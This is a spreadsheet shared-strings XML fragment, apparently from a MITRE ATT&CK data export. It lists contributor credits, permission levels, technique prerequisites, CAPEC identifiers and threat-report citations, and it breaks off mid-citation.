  <si>
    <t>AppOmni; Netskope; Praetorian</t>
  </si>
  <si>
    <t>Isif Ibrahima, Mandiant; Milos Stojadinovic; Naveen Vijayaraghavan, Nilesh Dherange (Gurucul); Praetorian; Regina Elwell</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom; Josh Liburdi, @jshlbrd; Toby Kohlenberg</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; William Cain</t>
  </si>
  <si>
    <t>David Tayouri</t>
  </si>
  <si>
    <t>William Cain</t>
  </si>
  <si>
    <t>TruKno</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Red Canary</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Praetorian</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom; Tristan Bennett, Seamless Intelligence</t>
  </si>
  <si>
    <t>Dave Westgard; Elia Florio, Microsoft; ExtraHop; Mnemonic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</t>
  </si>
  <si>
    <t>Chris Roffe</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Microsoft Security; Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; CrowdStrike; Daniel Prizmant, Palo Alto Networks; David Fiser, @anu4is, Trend Micro; Eran Ayalon, Cybereason; Idan Frimark, Cisco; Ilan Sokol, Cybereason; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Oren Ofer, Cybereason; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>Elastic</t>
  </si>
  <si>
    <t>Ivan Sinyakov</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>Brandon Dalton @PartyD0lphin</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Allen DeRyke, ICE; Matthew Green</t>
  </si>
  <si>
    <t>Bartosz Jerzman</t>
  </si>
  <si>
    <t>Robert Wilson; Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic</t>
  </si>
  <si>
    <t>Nick Carr, Mandiant</t>
  </si>
  <si>
    <t>Alfredo Abarca; William Cain</t>
  </si>
  <si>
    <t>Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>David Tayouri; Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Brad Geesaman, @bradgeesaman; Daniel Oakley; David Fiser, @anu4is, Trend Micro; David Tayouri; ExtraHop; Idan Frimark, Cisco; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Rory McCune, Aqua Security; Travis Smith, Tripwire; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Jen Burns, HubSpot; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Jen Burns, HubSpot</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Lee Christensen, SpecterOps; Toby Kohlenberg; Vinayak Wadhwa, Lucideus</t>
  </si>
  <si>
    <t>Jonhnathan Ribeiro, 3CORESec, @_w0rk3r; Ted Samuels, Rapid7</t>
  </si>
  <si>
    <t>Dor Edry, Microsoft</t>
  </si>
  <si>
    <t>Omkar Gudhate</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe; Red Canary</t>
  </si>
  <si>
    <t>Ivan Sinyakov; Jaron Bradley @jbradley89</t>
  </si>
  <si>
    <t>Janantha Marasinghe; Johann Rehberger; Menachem Shafran, XM Cyber</t>
  </si>
  <si>
    <t>Rick Cole, Mandiant</t>
  </si>
  <si>
    <t>Jesse Brown, Red Canary</t>
  </si>
  <si>
    <t>Stefan Kanthak</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee; Syed Ummar Farooqh, McAfee</t>
  </si>
  <si>
    <t>Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Cian Heasley; Daniel Feichter, @VirtualAllocEx, Infosec Tirol; Gal Singer, @galsinger29, Team Nautilus Aqua Security; Gordon Long, Box, Inc., @ethicalhax; Lucas Heiligenstein; Nathaniel Quist, Palo Alto Networks; Sarathkumar Rajendran, Microsoft Defender365; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Daniel Feichter, @VirtualAllocEx, Infosec Tirol; Mayuresh Dani, Qualys</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Emile Kenning, Sophos; Vikas Singh, Sophos</t>
  </si>
  <si>
    <t>Rob Smith</t>
  </si>
  <si>
    <t>Jorell Magtibay, National Australia Bank Limited; Kiyohito Yamamoto, RedLark, NTT Communications; Yusuke Kubo, RedLark, NTT Communications</t>
  </si>
  <si>
    <t>Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Walker Johnson</t>
  </si>
  <si>
    <t>Romain Dumont, ESET</t>
  </si>
  <si>
    <t>John Page (aka hyp3rlinx), ApparitionSec</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct</t>
  </si>
  <si>
    <t>Matthew Molyett, @s1air, Cisco Talos</t>
  </si>
  <si>
    <t>Csaba Fitzl @theevilbit of Offensive Security</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, Mandiant; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Erye Hernandez, Palo Alto Networks</t>
  </si>
  <si>
    <t>Chris Ross @xorrior</t>
  </si>
  <si>
    <t>Liran Ravich, CardinalOps</t>
  </si>
  <si>
    <t>George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black</t>
  </si>
  <si>
    <t>Netskope</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security; Pawel Partyka, Microsoft 365 Defender; Shanief Webb</t>
  </si>
  <si>
    <t>Gordon Long, Box, Inc., @ethicalhax; Stefan Kanthak</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix; Tiago Faria, 3CORESec</t>
  </si>
  <si>
    <t>Ryan Becwar</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>ExtraHop; Vincent Le Toux</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs; Edward Millington</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Red Canary</t>
  </si>
  <si>
    <t>Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Nick Cairns, @grotezinfosec</t>
  </si>
  <si>
    <t>Jonathan Boucher, @crash_wave, Bank of Canada; Krishnan Subramanian, @krish203; Stan Hegt, Outflank; Vinay Pidathala</t>
  </si>
  <si>
    <t>Filip Kafka, ESET</t>
  </si>
  <si>
    <t>Mnemonic AS; SOCCRATES</t>
  </si>
  <si>
    <t>Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, Mandiant; Praetorian; Ricardo Dias; Sahar Shukrun</t>
  </si>
  <si>
    <t>Microsoft Security</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Isif Ibrahima, Mandiant; Regina Elwell; Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>Daniel Prizmant, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Harshal Tupsamudre, Qualys; Miriam Wiesner, @miriamxyra, Microsoft Security</t>
  </si>
  <si>
    <t>Philip Winther</t>
  </si>
  <si>
    <t>Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee</t>
  </si>
  <si>
    <t>Menachem Goldstein; Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee</t>
  </si>
  <si>
    <t>Robert Simmons, @MalwareUtkonos</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Kobi Haimovich, CardinalOps; Mark Wee; Menachem Goldstein; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET; McAfee; Ryan Becwar</t>
  </si>
  <si>
    <t>Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>Boominathan Sundaram</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>Heather Linn; Jon Sheedy; Walker Johnson</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall</t>
  </si>
  <si>
    <t>Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; João Paulo de A. Filho, @Hug1nN__; Lior Ribak, SentinelOne; Rex Guo, @Xiaofei_REX, Confluera; Shlomi Salem, SentinelOne</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall; Zachary Stanford, @svch0st</t>
  </si>
  <si>
    <t>Anastasios Pingios</t>
  </si>
  <si>
    <t>Dan Borges, @1njection</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>Joas Antonio dos Santos, @Cr4zyC0d3</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Andrew Northern, @ex_raritas; Bryan Campbell, @bry_campbell; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Selena Larson, @selenalarson; Travis Smith, Tripwire; Zachary Abzug, @ZackDoesML</t>
  </si>
  <si>
    <t>Andrew Northern, @ex_raritas; Bryan Campbell, @bry_campbell; Selena Larson, @selenalarson; Sittikorn Sangrattanapitak; Zachary Abzug, @ZackDoesML</t>
  </si>
  <si>
    <t>SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft; Vinayak Wadhwa, SAFE Security</t>
  </si>
  <si>
    <t>Wes Hurd</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP</t>
  </si>
  <si>
    <t>Christoffer Strömblad; ESET</t>
  </si>
  <si>
    <t>Arnim Rupp, Deutsche Lufthansa AG</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Cisco; Oleg Kolesnikov, Securonix; Praetorian; Shailesh Tiwary (Indian Army); Varonis Threat Labs</t>
  </si>
  <si>
    <t>Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>Isif Ibrahima, Mandiant</t>
  </si>
  <si>
    <t>Goldstein Menachem; Vijay Lalwani; Will Jolliffe; Will Thomas, Equinix Threat Analysis Center (ETAC)</t>
  </si>
  <si>
    <t>Kobi Haimovich, CardinalOps</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Jen Burns, HubSpot; Mark Wee; Ram Pliskin, Microsoft Azure Security Center; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army); Suzy Schapperle - Microsoft Azure Red Team</t>
  </si>
  <si>
    <t>Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Lee Christensen, SpecterOps; Thirumalai Natarajan, Mandiant; Tristan Bennett, Seamless Intelligence</t>
  </si>
  <si>
    <t>Cody Thomas, SpecterOps; Tim (Wadhwa-)Brown</t>
  </si>
  <si>
    <t>Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar; Yossi Nisani, Cymptom</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom</t>
  </si>
  <si>
    <t>Abel Morales, Exabeam</t>
  </si>
  <si>
    <t>Brandon Dalton @PartyD0lphin; Swasti Bhushan Deb, IBM India Pvt. Ltd.</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps</t>
  </si>
  <si>
    <t>Veeral Patel</t>
  </si>
  <si>
    <t>Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian; Wes Hurd</t>
  </si>
  <si>
    <t>Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</t>
  </si>
  <si>
    <t>Casey Smith; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>@ionstorm; Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Alexandros Pappas; Ziv Kaspersky, Cymptom</t>
  </si>
  <si>
    <t>Casey Smith</t>
  </si>
  <si>
    <t>Casey Smith; Gareth Phillips, Seek Ltd.; James_inthe_box, Me; Ricardo Dias</t>
  </si>
  <si>
    <t>Rodrigo Garcia, Red Canary</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Maril Vernon @shewhohacks; Praetorian</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Katie Nickels, Red Canary; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Wes Hurd</t>
  </si>
  <si>
    <t>Harshal Tupsamudre, Qualys</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Praetorian</t>
  </si>
  <si>
    <t>Praetorian; Wes Hurd</t>
  </si>
  <si>
    <t>Atul Nair, Qualys</t>
  </si>
  <si>
    <t>FIRST.ORG's Cyber Threat Intelligence SIG</t>
  </si>
  <si>
    <t>David Routin; Michal Dida, ESET</t>
  </si>
  <si>
    <t>Brian Wiltse @evalstrings; Michael Raggi @aRtAGGI; Patrick Campbell, @pjcampbe11</t>
  </si>
  <si>
    <t>Josh Day, Gigamon; Tony Lee</t>
  </si>
  <si>
    <t>CrowdStrike; Tim (Wadhwa-)Brown</t>
  </si>
  <si>
    <t>Darin Smith, Cisco; ExtraHop; Praetorian</t>
  </si>
  <si>
    <t>Casey Smith; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>@ionstorm; Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t>ExtraHop; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Jay Chen, Palo Alto Networks; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Jay Chen, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Rory McCune, Aqua Security; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>Ian Davila, Tidal Cyber; Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Jen Burns, HubSpot; Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Ryan Becwar; Vincent Le Toux</t>
  </si>
  <si>
    <t>Jen Burns, HubSpot; Johann Rehberger</t>
  </si>
  <si>
    <t>Oleg Skulkin, Group-IB</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security; Mark Wee; Netskope; Praetorian; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee; Syed Ummar Farooqh, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Sunny Neo</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Jeff Felling, Red Canary; Jorge Orchilles, SCYTHE; Ruben Dodge, @shotgunner101</t>
  </si>
  <si>
    <t>@ionstorm</t>
  </si>
  <si>
    <t>Avneet Singh; Casey Smith; Praetorian</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</t>
  </si>
  <si>
    <t>Administrator, root, User</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>root, User</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>Administrator, root, SYSTEM</t>
  </si>
  <si>
    <t>Administrator, root, SYSTEM, User</t>
  </si>
  <si>
    <t>root, SYSTEM, User</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>root, SYSTEM</t>
  </si>
  <si>
    <t>Remote Desktop Users, User</t>
  </si>
  <si>
    <t>Permissions to access directories, files, and API endpoints that store information of interest.</t>
  </si>
  <si>
    <t>Python is installed.</t>
  </si>
  <si>
    <t>Privileges to access certain files and directories</t>
  </si>
  <si>
    <t>Privileges to access network shared drive</t>
  </si>
  <si>
    <t>Privileges to access removable media drive and files</t>
  </si>
  <si>
    <t>Secure boot disabled on systems running Windows 8 and later</t>
  </si>
  <si>
    <t>Presence of physical medium or device</t>
  </si>
  <si>
    <t>Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.</t>
  </si>
  <si>
    <t>Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network.</t>
  </si>
  <si>
    <t>Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</t>
  </si>
  <si>
    <t>NTFS partitioned hard drive</t>
  </si>
  <si>
    <t>MS Office version specified in &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream must match host</t>
  </si>
  <si>
    <t>Clearing the Windows event logs requires Administrator permissions</t>
  </si>
  <si>
    <t>Established network share connection to a remote system. Level of access depends on permissions of the account used.</t>
  </si>
  <si>
    <t>An externally facing login portal is configured.</t>
  </si>
  <si>
    <t>Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.
Out-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.
Hardware token: Access to the seed and algorithm of generating one-time codes.</t>
  </si>
  <si>
    <t>Network interface access and packet capture driver</t>
  </si>
  <si>
    <t>Access to Domain Controller or backup</t>
  </si>
  <si>
    <t>Compiler software (either native to the system or delivered by the adversary)</t>
  </si>
  <si>
    <t>Office 2007, 2010, 2013, and 2016</t>
  </si>
  <si>
    <t>Ability to update component device firmware from the host operating system.</t>
  </si>
  <si>
    <t>Administrator, SYSTEM may provide better process ownership details</t>
  </si>
  <si>
    <t>SSH service enabled, trust relationships configured, established connections</t>
  </si>
  <si>
    <t>Active remote service accepting connections and valid credentials</t>
  </si>
  <si>
    <t>RDP service enabled, account in the Remote Desktop Users group</t>
  </si>
  <si>
    <t>SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account.</t>
  </si>
  <si>
    <t>An SSH server is configured and running.</t>
  </si>
  <si>
    <t>VNC server installed and listening for connections.</t>
  </si>
  <si>
    <t>Removable media allowed, Autorun enabled or vulnerability present that allows for code execution</t>
  </si>
  <si>
    <t>Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.</t>
  </si>
  <si>
    <t>Kerberos authentication enabled</t>
  </si>
  <si>
    <t>Valid domain account</t>
  </si>
  <si>
    <t>Valid domain account or the ability to sniff traffic within a domain</t>
  </si>
  <si>
    <t>Access to shared folders and content with write permissions</t>
  </si>
  <si>
    <t>.NET Framework version 4 or higher</t>
  </si>
  <si>
    <t>Access to files</t>
  </si>
  <si>
    <t>Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys.</t>
  </si>
  <si>
    <t>Microsoft Core XML Services (MSXML) or access to wmic.exe</t>
  </si>
  <si>
    <t>CAPEC-633</t>
  </si>
  <si>
    <t>CAPEC-575</t>
  </si>
  <si>
    <t>CAPEC-630</t>
  </si>
  <si>
    <t>CAPEC-94</t>
  </si>
  <si>
    <t>CAPEC-634</t>
  </si>
  <si>
    <t>CAPEC-117</t>
  </si>
  <si>
    <t>CAPEC-564</t>
  </si>
  <si>
    <t>CAPEC-270</t>
  </si>
  <si>
    <t>CAPEC-132</t>
  </si>
  <si>
    <t>CAPEC-579</t>
  </si>
  <si>
    <t>CAPEC-49</t>
  </si>
  <si>
    <t>CAPEC-600</t>
  </si>
  <si>
    <t>CAPEC-55</t>
  </si>
  <si>
    <t>CAPEC-565</t>
  </si>
  <si>
    <t>CAPEC-637</t>
  </si>
  <si>
    <t>CAPEC-550, CAPEC-551</t>
  </si>
  <si>
    <t>CAPEC-478, CAPEC-550, CAPEC-551</t>
  </si>
  <si>
    <t>CAPEC-639</t>
  </si>
  <si>
    <t>CAPEC-227, CAPEC-131, CAPEC-130, CAPEC-125</t>
  </si>
  <si>
    <t>CAPEC-469, CAPEC-482</t>
  </si>
  <si>
    <t>CAPEC-488, CAPEC-489, CAPEC-528</t>
  </si>
  <si>
    <t>CAPEC-558</t>
  </si>
  <si>
    <t>CAPEC-556</t>
  </si>
  <si>
    <t>CAPEC-555</t>
  </si>
  <si>
    <t>CAPEC-127, CAPEC-497</t>
  </si>
  <si>
    <t>CAPEC-440</t>
  </si>
  <si>
    <t>CAPEC-471</t>
  </si>
  <si>
    <t>CAPEC-641</t>
  </si>
  <si>
    <t>CAPEC-13, CAPEC-640</t>
  </si>
  <si>
    <t>CAPEC-13, CAPEC-38</t>
  </si>
  <si>
    <t>CAPEC-159</t>
  </si>
  <si>
    <t>CAPEC-38</t>
  </si>
  <si>
    <t>CAPEC-17</t>
  </si>
  <si>
    <t>CAPEC-478</t>
  </si>
  <si>
    <t>CAPEC-578</t>
  </si>
  <si>
    <t>CAPEC-13</t>
  </si>
  <si>
    <t>CAPEC-571</t>
  </si>
  <si>
    <t>CAPEC-93</t>
  </si>
  <si>
    <t>CAPEC-569</t>
  </si>
  <si>
    <t>CAPEC-659</t>
  </si>
  <si>
    <t>CAPEC-568</t>
  </si>
  <si>
    <t>CAPEC-177</t>
  </si>
  <si>
    <t>CAPEC-649</t>
  </si>
  <si>
    <t>CAPEC-203</t>
  </si>
  <si>
    <t>CAPEC-125, CAPEC-486</t>
  </si>
  <si>
    <t>CAPEC-490</t>
  </si>
  <si>
    <t>CAPEC-300</t>
  </si>
  <si>
    <t>CAPEC-643</t>
  </si>
  <si>
    <t>CAPEC-158</t>
  </si>
  <si>
    <t>CAPEC-267</t>
  </si>
  <si>
    <t>CAPEC-572, CAPEC-655</t>
  </si>
  <si>
    <t>CAPEC-570</t>
  </si>
  <si>
    <t>CAPEC-636</t>
  </si>
  <si>
    <t>CAPEC-646</t>
  </si>
  <si>
    <t>CAPEC-576</t>
  </si>
  <si>
    <t>CAPEC-98</t>
  </si>
  <si>
    <t>CAPEC-163</t>
  </si>
  <si>
    <t>CAPEC-552</t>
  </si>
  <si>
    <t>CAPEC-532</t>
  </si>
  <si>
    <t>CAPEC-573</t>
  </si>
  <si>
    <t>CAPEC-640</t>
  </si>
  <si>
    <t>CAPEC-481</t>
  </si>
  <si>
    <t>CAPEC-647</t>
  </si>
  <si>
    <t>CAPEC-561</t>
  </si>
  <si>
    <t>CAPEC-292</t>
  </si>
  <si>
    <t>CAPEC-557</t>
  </si>
  <si>
    <t>CAPEC-648</t>
  </si>
  <si>
    <t>CAPEC-650</t>
  </si>
  <si>
    <t>CAPEC-187</t>
  </si>
  <si>
    <t>CAPEC-580</t>
  </si>
  <si>
    <t>CAPEC-581</t>
  </si>
  <si>
    <t>CAPEC-652</t>
  </si>
  <si>
    <t>CAPEC-509</t>
  </si>
  <si>
    <t>CAPEC-479</t>
  </si>
  <si>
    <t>CAPEC-437, CAPEC-438, CAPEC-439</t>
  </si>
  <si>
    <t>CAPEC-312</t>
  </si>
  <si>
    <t>CAPEC-309</t>
  </si>
  <si>
    <t>CAPEC-577</t>
  </si>
  <si>
    <t>CAPEC-574</t>
  </si>
  <si>
    <t>CAPEC-295</t>
  </si>
  <si>
    <t>CAPEC-562</t>
  </si>
  <si>
    <t>CAPEC-593</t>
  </si>
  <si>
    <t>CAPEC-644</t>
  </si>
  <si>
    <t>CAPEC-645</t>
  </si>
  <si>
    <t>CAPEC-60</t>
  </si>
  <si>
    <t>CAPEC-560</t>
  </si>
  <si>
    <t>CAPEC-70</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Integrity</t>
  </si>
  <si>
    <t>Administrator, root</t>
  </si>
  <si>
    <t>,(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: ESET InvisiMole June 2018),(Citation: GitHub PoshC2),(Citation: ESET EvilNum July 2020),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant No Easy Breach),(Citation: FinFisher Citation),(Citation: GitHub Pupy),(Citation: Eset Ramsay May 2020),(Citation: Dell Sakula),(Citation: ClearSky MuddyWater Nov 2018),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Cisco H1N1 Part 2),(Citation: Fortinet Remcos Feb 2017),(Citation: Group IB Cobalt Aug 2017),(Citation: Securelist ScarCruft May 2019),(Citation: F-Secure BlackEnergy 2014),(Citation: Proofpoint ZeroT Feb 2017),(Citation: TrendMicro EarthLusca 2022),(Citation: Trend Micro Tick November 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: Github PowerShell Empire),(Citation: Cybereason Bumblebee August 2022),(Citation: ESET Grandoreiro April 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: ESET Gelsemium June 2021),(Citation: Microsoft FinFisher March 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Github Koadic),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: McAfee Honeybee),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Novetta Winnti April 2015),(Citation: Check Point Warzone Feb 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: NCC Group WastedLocker June 2020),(Citation: ESET RTM Feb 2017),(Citation: ESET PipeMon May 2020),(Citation: Secure List Bad 